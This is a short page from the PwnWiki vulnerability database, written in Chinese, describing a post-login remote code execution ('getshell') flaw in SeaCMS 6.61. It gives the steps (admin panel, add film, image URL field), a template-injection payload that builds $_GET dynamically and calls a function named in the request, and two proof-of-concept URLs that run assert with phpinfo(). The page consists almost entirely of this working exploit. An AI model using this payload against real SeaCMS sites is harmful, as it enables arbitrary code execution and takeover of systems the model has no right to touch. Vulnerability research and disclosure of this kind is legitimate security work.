Loading
0

Seacms6.61后台getshell漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

Usage

后台→添加影片→ 图片地址→payload

POC

{if:1)$GLOBALS'_G'.'ET'a($GLOBALS'_G'.'ET'b);//}{end if}

http://192.168.0.6/seacms661/detail/?1.html&a=assert&b=phpinfo();

http://192.168.0.6/seacms661/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();

PWNWIK.COM